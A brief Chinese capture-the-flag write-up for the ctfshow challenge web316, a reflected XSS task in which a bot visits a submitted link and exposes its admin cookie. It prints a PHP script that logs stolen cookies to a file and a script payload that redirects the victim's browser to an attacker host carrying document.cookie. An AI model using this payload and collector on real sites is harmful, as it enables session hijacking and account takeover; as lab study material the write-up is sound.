web316(反射XSS-cookie)
后台会每隔一段时间(一般为15秒)去访问一次我们的链接(毕竟要领10个鸡蛋bot要康康你的分享状态),当BOT访问我们的xss的时候我们就能拿到admin的cookie。
搭建在自己的网站上,写一段php代码即可,如
# xss.php <?php $cookie = $_GET['cookie']; $log = fopen("cookie.txt", "a"); fwrite($log, $cookie . "\n"); fclose($log); ?>
<script>document.location.href="http://ip/xss.php?cookie="+document.cookie</script>
浙公网安备 33010602011771号